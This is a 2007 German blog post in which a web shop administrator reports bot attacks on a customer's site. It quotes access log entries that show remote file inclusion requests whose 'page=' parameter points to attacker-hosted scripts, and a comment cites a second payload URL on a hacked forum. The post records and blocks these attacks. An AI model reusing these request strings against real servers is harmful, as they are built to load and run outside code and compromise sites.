Saturday, April 14. 2007Exploit BYY xeQter
In einem Shop unserer Kunden versucht nun schon seit einer Stunde jemand einen (scheinbar) neuen Exploit untertzbringen.
Es werden immer Seiten nach dem Muster /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? versucht aufzurufen. Mein Kaspersky rät davon ab die Seite http://62.129.173.149/img/dog.c? aufzurufen, um zu gucken was sich dahinter verbirgt  Ist ja auch nicht so wichtig. Ich nehme vorsorglich mal die 62.129.173.149 in die Liste der verbotenen Hosts mit auf. Die Zugriffe selber kamen allerdings von verschiedenen Adressen im 200er IP Adressbereich, so dass man davon ausgehen darf, dass hier einige Bots infizierbare Seiten abgrasen.65.75.134.50 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19468 "-" "libwww-perl/5.805" 85.214.41.173 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19473 "-" "libwww-perl/5.803" 200.72.22.114 - - "GET /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19471 "-" "libwww-perl/5.800" 213.201.4.83 - - "GET /index.php/cat/index.php?cat=1&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19463 "-" "libwww-perl/5.805" 85.19.150.85 - - "GET /index.php/cat/index.php?cat=&page=http://62.129.173.149/img/dog.c? HTTP/1.1" 200 19216 "-" "libwww-perl/5.805" Naja... Viel Spaß noch Ob mein deny from 62.129.173.149 in der .htaccess wirklich etwas bringt? 
Comments
Display comments as
(Linear | Threaded)
Ja huch?!
Ähnliche Versuche zeigen heute auch mal ein Deutsches Forum als Adresse: /index.php?cat=http://www.freezers-fanforum.de/freezersticker1/includes/php_version/freeman.txt? Entweder wurde die Datei dort unwissentlich platziert oder die Admins üben selber das "Defacen"...
Na gut, ich würde sagen, dass die selber gehackt wurden
http://www.freezers-fanforum.de/freezersticker1/includes/php_version/ Da liegt eigentlich alles was man braucht. evologIQ empfiehlt: TURK TELEKOM aussperren und das hier. |
QuicksearchKommentare about Magento eCommerce beta Sat, 29.11.2008 17:52 Bin gerade über den Blogbeitrag "gestolpert" und musste [...] about Spenden empfangen mit Paypal Tue, 25.11.2008 14:39 Ich weiss nicht genau, ob dieses Problem noch existiert, da [...] about Foxit PDF Editor Keymaker Mon, 24.11.2008 20:46 Haha, sehr witzig!!!! Hat geklappt, audf die seite kommt [...] about Mediaplayer auf der Taskleiste Sat, 15.11.2008 04:21 Perfekt! Endlich (nach langem Suchen und Lesen ewig gleich [...] Populäre Stichworte.htaccess, .net, 0900, 301, 560151117, abmahnung, adsense, adwords, ajax, akkaly, alice, amazon, analytics, anleitung, anonym, antispy, antivirus, arcor, ascii, ashampoo, asus, aufzeichnen, auktion, auskunft, ausschreibung, axis, backup, bank, beausoft, beerdigung, berlin, bild, bilder, bin, blog, bmw, brennen, britney spears, brother, browser, buch, c64, canon, ccc, checkout, china, computerbild, copyright, cracks.am, creator, crysis, cse, css, dateiendung, datenschutz, ddos, dec, dell, derproblemloeungsweg, deutschland, digital equipment, dmoz, domain, domainumzug, dos, download, dukudu, dvb-t, DXF, easyjet, ebay, editor, eeepc, einbrecher, ekelhaft, elv, email, energiesparend, eos, eraser, erfahrungsbericht, evologiq, favicon, fehlermeldung, filezilla, finanzamt, firefox, flash, flugzeuge, form designer, forum, fotos, foxit, foxit reader, foxit software, foxitsoftware, freeware, ftp, fun, fwp, gadgets, geldwäsche, gericht, geschenk, gez, gmail, google, google earth, google maps, google talk, gps, grafiken, gravenreuth, habbo, hacking, hamburg, handy, hash, hausdurchsuchung, hex, hosting, html, hype, iban, ibproarcade, icons, ifilter, images, impressum, internet, internetrecht, ioncube, ip, isdn, italien, jtl-shop, JTL Wawi, jungledisk, justiz, kalender, kaspersky, keygen, keymaker, kimble, klima, klimaschutz, korrupt, krater, kreditkarte, krieg, lexware, links, linkvendor, m3, magdeburg, magento commerce, map, md5, mediaon, media player, megaupload, messenger, millionär, mobile, mobotix, mod-rewrite, moneybookers, mord, mozy, mp3, mr. wong, msn, msn messenger, namecheap, namen, netbook, netcam watcher, netzwerkkamera, nummernschild, office, onlinebanking, opera, osama bin laden, p2p, page organizer, pagerank, paris, paypal, paypal express, pdf, pdf creator, pdf editor, pdf pro pack, pgp, php, phpmyadmin, poker, politik, polizei, premiere, problems-solution, pro pack, ps3, rapidshare, rassist, red baron, referrer, religion, robots.txt, rotwein, rss, s9y, schäuble, security, seo, serendipity, serial, serial.txt, server, shop, shopsysteme, simp, sitemap, skype, sniper, software, sonntag, spam, sperrung, spiele, spyware, sql, staat, statistik, stempel, steuern, stgb, strom sparen, suchen, suchmaschine, suchmaschinenmarketing, suchmaschinenoptimierung, surveillancesoftware, sylt, tagesschau, telekom, templates, terra notebook, testbericht, text, the bat!, thomsn, toilettenpapier, tor, torbutton, truecrypt, tv, umfrage, umleitung, urlaub, usb, ust, validator, vbadvanced, vbulletin, vbulletin-blog, verschlüsseln, veyton, videoüberwachung, villeroy, viren, virus, visitenkarte, vista, w3c, wbb, webcam, webcam watcher, webkatalog, webserver, werbung, whois, winamp, windkraft, xdrive, xinu, xt commerce, youporn, youtube, zattoo, zoll
Letzte Google Suchemedia player in symbolleiste vista
foxit ftp reader paypal express kauf bei xt commerce wie Terra Notebooks morfeus fucking scanner xt:Commerce exploit Was tun gegen dos attack "Morfeus Fucking Scanner" Kaspersky keymaker fail2ban morfeus Fucking Scanner pdf creator serial pdf editor 2.0 seriennummer sitemap online erstellen alice hotline telefonnummer Morfeus Fucking Scanner aus google austragen terra notebooks KategorienPartnerBlog abonnierenLanguage/SpracheBlogfever |
evologiq - Das Blog
04/19/2007 10:34PM
Es scheint wirklich groß in Mode zu sein, mit automatisierten Skripts Schwachstellen auf Webservern zu suchen. Falls hier bald nichts mehr antwortet, dann hat das was hiermit zu tun : 2007-04-19 22:27 unknown libwww-perl/5.65 nwns0001.nwwnet.net 2